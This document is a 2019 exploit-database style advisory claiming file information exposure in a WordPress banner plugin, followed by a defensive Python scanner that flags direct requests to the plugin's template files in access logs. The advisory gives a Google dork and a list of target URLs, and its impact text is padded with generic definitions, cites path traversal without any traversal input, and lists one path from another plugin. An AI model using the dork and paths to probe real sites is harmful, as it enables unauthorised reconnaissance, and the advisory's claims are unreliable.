WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure

2019.01.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-538

###########################################################################
# Exploit Title : WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
# Software Download Link : responsivejqueryslider.com/wordpressplugin/playlist_banner.html
# Software Information Link : themesinfo.com/wordpress-plugins/wordpress-all_in_one_bannerwithplaylist-plugin-dgut
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 1.0 - 1.2.8 - 1.4.7 - 1.8.1 - 1.8.5 - 2.0 - 2.1.3 - 2.2.0 - 2.4 - 4.0.25 - 4.5.16 - 4.9.9 - 5.0.3
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerWithPlaylist/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
#                      CWE-538 [ File and Directory Information Exposure ]
#                      CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
###########################################################################
# Impact :
********
* WordPress all_in_one_bannerWithPlaylist 5.0.3 and other versions are prone to an arbitrary file disclosure vulnerability because the plugin fails to properly sanitize user-supplied input.
* An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in launching further attacks.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.
* The software uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but it does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside of the restricted directory.
###########################################################################
# Exploit :
***********************
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php?page=all_in_one_bannerWithPlaylist_Manage_Banners
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php?page=all_in_one_bannerWithPlaylist_Playlist
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/banners.php
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/help.php
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Manage_Banners
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Add_New
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Settings
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Playlist
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Help
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/playlist.php
/wp-content/plugins/lbg_zoominoutslider/tpl/preview.html
/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/settings_form.php
###########################################################################
# Video Tutorials :
*****************
Step 1: Installation :
  youtube.com/watch?v=nYp94Ri8CME
Step 2: Manage Images :
  youtube.com/watch?v=gQezs4xWwSs
Step 3: Manage Text Over Image :
  youtube.com/watch?v=3wR64OtLx7Q
Step 4: Manage Multiple Banners :
  youtube.com/watch?v=3EfdmbjTvoY
###########################################################################
# Example Vulnerable Sites :
*************************
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
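The tpl/*.php files listed above are meant to be loaded by the plugin's WordPress admin screens, so a request that reaches them directly by URL is worth flagging. As an added example (not code from the advisory or from the plugin's author), the following Python checker walks an Apache combined-format access log and reports direct hits on the plugin's tpl/ directory, separating confirmed 2xx exposures from blocked probes; the log format, the IP addresses and the sample lines are assumptions constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Template directory named in the advisory (compared case-insensitively).
PLUGIN_TPL_DIR = "/wp-content/plugins/all_in_one_bannerwithplaylist/tpl/"

# Apache "combined" access-log layout is assumed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def classify(line: str):
    """Return None for an unrelated line, else a finding for a direct tpl/ request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode percent-encoding twice (double-encoded variants) and drop the query string.
    path = unquote(unquote(m.group("target"))).split("?", 1)[0].lower()
    if PLUGIN_TPL_DIR not in path:
        return None
    status = int(m.group("status"))
    # A 2xx means the server served the template to the client: confirmed exposure.
    # Any other status is a probe the server blocked or could not fulfil.
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": path,
        "status": status,
        "verdict": "exposed" if 200 <= status < 300 else "blocked-probe",
    }

def scan(lines):
    """Run classify() over an iterable of log lines and keep only the findings."""
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample log (documentation IP ranges, not real traffic); plugin paths are from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jan/2019:10:01:02 +0100] "GET /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php HTTP/1.1" 200 1843 "-" "curl/7.58"',
    '203.0.113.5 - - [14/Jan/2019:10:01:03 +0100] "GET /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Settings HTTP/1.1" 403 199 "-" "curl/7.58"',
    '198.51.100.9 - - [14/Jan/2019:10:05:00 +0100] "GET /wp-admin/admin.php?page=all_in_one_bannerWithPlaylist_Manage_Banners HTTP/1.1" 200 9210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Jan/2019:10:05:01 +0100] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 200 4110 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['verdict']:14} {f['status']} {f['ip']} {f['path']}")
```

The admin.php request in the sample is how the plugin is normally used and is not flagged; only the two direct tpl/ requests are reported.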
